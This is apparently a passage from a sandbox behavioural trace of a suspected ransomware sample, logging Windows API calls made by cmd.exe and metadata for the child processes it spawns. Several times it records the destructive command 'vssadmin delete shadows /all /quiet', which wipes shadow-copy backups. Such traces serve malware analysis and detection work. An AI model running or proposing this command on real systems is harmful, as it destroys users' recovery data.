(_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0262.862] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0262.862] GetProcessHeap () returned 0x280000 [0262.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294660 | out: hHeap=0x280000) returned 1 [0262.862] GetProcessHeap () returned 0x280000 [0262.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x299ac0 [0262.862] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1bf080*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf030 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x1bf030*(hProcess=0x50, hThread=0x54, dwProcessId=0x658, dwThreadId=0x65c)) returned 1 [0262.868] CloseHandle (hObject=0x54) returned 1 [0262.868] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0262.868] GetProcessHeap () returned 0x280000 [0262.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f4e0 | out: hHeap=0x280000) returned 1 [0262.868] GetEnvironmentStringsW () returned 0x2989c0* [0262.868] GetProcessHeap () returned 0x280000 [0262.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb22) returned 0x29e9b0 [0262.868] FreeEnvironmentStringsW (penv=0x2989c0) returned 1 [0262.868] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x1be938, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1be938, ReturnLength=0x0) returned 0x0 [0262.868] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffda000, lpBuffer=0x1be970, nSize=0x380, lpNumberOfBytesRead=0x1be930 | out: lpBuffer=0x1be970*, lpNumberOfBytesRead=0x1be930*=0x380) returned 1 [0262.868] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0266.444] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1bef78 | out: lpExitCode=0x1bef78*=0x2) returned 1 [0266.444] CloseHandle (hObject=0x50) returned 1 [0266.444] _vsnwprintf (in: _Buffer=0x1bf1e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bef88 | out: _Buffer="00000002") returned 8 [0266.444] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0266.444] GetProcessHeap () returned 0x280000 [0266.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29e9b0 | out: hHeap=0x280000) returned 1 [0266.444] GetEnvironmentStringsW () returned 0x2989c0* [0266.445] GetProcessHeap () returned 0x280000 [0266.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb22) returned 0x29e9b0 [0266.445] FreeEnvironmentStringsW (penv=0x2989c0) returned 1 [0266.445] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0266.445] GetProcessHeap () returned 0x280000 [0266.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29e9b0 | out: hHeap=0x280000) returned 1 [0266.445] GetEnvironmentStringsW () returned 0x2989c0* [0266.445] GetProcessHeap () returned 0x280000 [0266.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb22) returned 0x29e9b0 [0266.445] FreeEnvironmentStringsW (penv=0x2989c0) returned 1 [0266.445] GetProcessHeap () returned 0x280000 [0266.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299ac0 | out: hHeap=0x280000) returned 1 [0266.445] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf048 | out: lpAttributeList=0x1bf048) [0266.445] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0266.446] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.446] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0266.446] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.446] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a08e194 | out: lpMode=0x4a08e194) returned 0 [0266.446] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.446] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a08e198 | out: lpMode=0x4a08e198) returned 0 [0266.446] GetConsoleOutputCP () returned 0x4e3 [0266.446] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0266.446] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0266.446] GetProcessHeap () returned 0x280000 [0266.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299c60 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ba00 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295bb0 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b9a0 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299a50 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29aae0 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a0090 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294630 | out: hHeap=0x280000) returned 1 [0266.447] GetProcessHeap () returned 0x280000 [0266.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299840 | out: hHeap=0x280000) returned 1 [0266.447] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1bf4a8 | out: _Buffer="\r\n") returned 2 [0266.447] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.447] GetFileType (hFile=0xf4) returned 0x3 [0266.447] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.447] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0266.447] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf478, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf478*=0x2, lpOverlapped=0x0) returned 1 [0266.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0266.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a09c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0266.447] _vsnwprintf (in: _Buffer=0x4a08eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1bf4b8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0266.447] _vsnwprintf (in: _Buffer=0x4a08eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1bf4b8 | out: _Buffer=">") returned 1 [0266.447] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.447] GetFileType (hFile=0xf4) returned 0x3 [0266.447] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.447] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0266.448] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1bf4a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf4a8*=0x14, lpOverlapped=0x0) returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] GetFileType (hFile=0xe8) returned 0x3 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0266.448] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e320, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0266.448] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e322, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0266.448] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0266.448] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e326, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0266.448] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e328, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] GetFileType (hFile=0xe8) returned 0x3 [0266.448] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.448] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.448] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.448] GetFileType (hFile=0xf4) returned 0x3 [0266.448] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.448] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0266.448] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1bf788, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf788*=0x5, lpOverlapped=0x0) returned 1 [0266.448] GetProcessHeap () returned 0x280000 [0266.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x2a2010 [0266.449] GetProcessHeap () returned 0x280000 [0266.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a2010 | out: hHeap=0x280000) returned 1 [0266.449] GetProcessHeap () returned 0x280000 [0266.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299840 [0266.449] GetProcessHeap () returned 0x280000 [0266.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x294630 [0266.449] GetConsoleOutputCP () returned 0x4e3 [0266.449] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0266.449] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0266.449] GetConsoleTitleW (in: lpConsoleTitle=0x1bf740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.449] GetProcessHeap () returned 0x280000 [0266.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x14) returned 0x298940 [0266.449] GetProcessHeap () returned 0x280000 [0266.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x294660 [0266.450] GetProcessHeap () returned 0x280000 [0266.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x21c) returned 0x29b9a0 [0266.450] GetConsoleTitleW (in: lpConsoleTitle=0x29b9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.450] GetProcessHeap () returned 0x280000 [0266.450] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29b9a0, Size=0x62) returned 0x29b9a0 [0266.450] GetProcessHeap () returned 0x280000 [0266.450] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29b9a0) returned 0x62 [0266.450] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - Exit") returned 1 [0266.450] GetProcessHeap () returned 0x280000 [0266.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b9a0 | out: hHeap=0x280000) returned 1 [0266.450] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0266.451] exit (_Code=2) Process: id = "10" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x6eedd000" os_pid = "0x644" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x608" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e656" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0x648 Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x6e5ea000" os_pid = "0x658" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x608" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e656" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x65c Thread: id = 69 os_tid = 0x6b8 Thread: id = 71 os_tid = 0x6cc Thread: id = 72 os_tid = 0x6e4 Thread: id = 73 os_tid = 0x6e8